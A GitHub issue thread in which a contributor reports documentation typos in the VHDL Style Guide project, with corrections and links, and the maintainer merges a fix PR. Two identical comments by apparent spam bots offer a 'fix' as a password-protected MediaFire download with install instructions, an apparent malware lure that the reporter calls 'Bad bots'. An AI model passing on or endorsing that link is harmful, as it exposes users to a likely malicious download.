jeremiah-c-leary/vhdl-style-guide #1220: Typos and broken links in documentation

JHertz5, 2024-08-28:
**Environment**
VSG v3.25.0

**Describe the bug**
There are some typos and broken links that I've noticed in the documentation

| Typo | Correction | Link |
| - | - | - |
| concate | concatenate | https://vhdl-style-guide.readthedocs.io/en/3.25.0/whitespace_rules.html#whitespace-010 |
| elisif | elsif | https://vhdl-style-guide.readthedocs.io/en/3.25.0/variable_rules.html#variable-011 |
| elisif | elsif | https://vhdl-style-guide.readthedocs.io/en/3.25.0/signal_rules.html#signal-014 |
| minimumal | minimal | https://vhdl-style-guide.readthedocs.io/en/3.25.0/localizing.html#single-line-violations |
| enfoced | enforced | https://vhdl-style-guide.readthedocs.io/en/3.25.0/if_rules.html#if-030 |
| assingment | assignment | https://vhdl-style-guide.readthedocs.io/en/3.25.0/configuring_selected_assignment_structure_rules.html#rules-enforcing-selected-assignment-structure-rules |
| entiry | entry | https://vhdl-style-guide.readthedocs.io/en/3.25.0/configuring_indentation.html#update-indent-configuration |
| Instantions | Instantiations | https://vhdl-style-guide.readthedocs.io/en/3.25.0/configuring_indentation.html#example-2 |
| exampes | examples | https://vhdl-style-guide.readthedocs.io/en/3.25.0/configuring_conditional_multiline_indent_rules.html#configuring-conditional-multiline-indent-rules |
| guart | guard | https://vhdl-style-guide.readthedocs.io/en/3.25.0/block_rules.html#block-100 |
| interogated | interrogated | https://vhdl-style-guide.readthedocs.io/en/3.25.0/theory_of_operation/internal_data_structure.html#example |

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

qiliq, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

JHertz5, 2024-08-28:
Bad bots >:(

JHertz5, 2024-08-28:
I've raised PR #1221 to fix these.

jeremiah-c-leary, 2024-09-09:
Evening @JHertz5 ,

Thanks for the documentation updates.  I will get this merged to master.

Regards,

--Jeremy

PR #1221 (2024-09-09): Issue#1220: Documentation typo and link fixes.
Resolve #1220.
closed 2024-09-09 by jeremiah-c-leary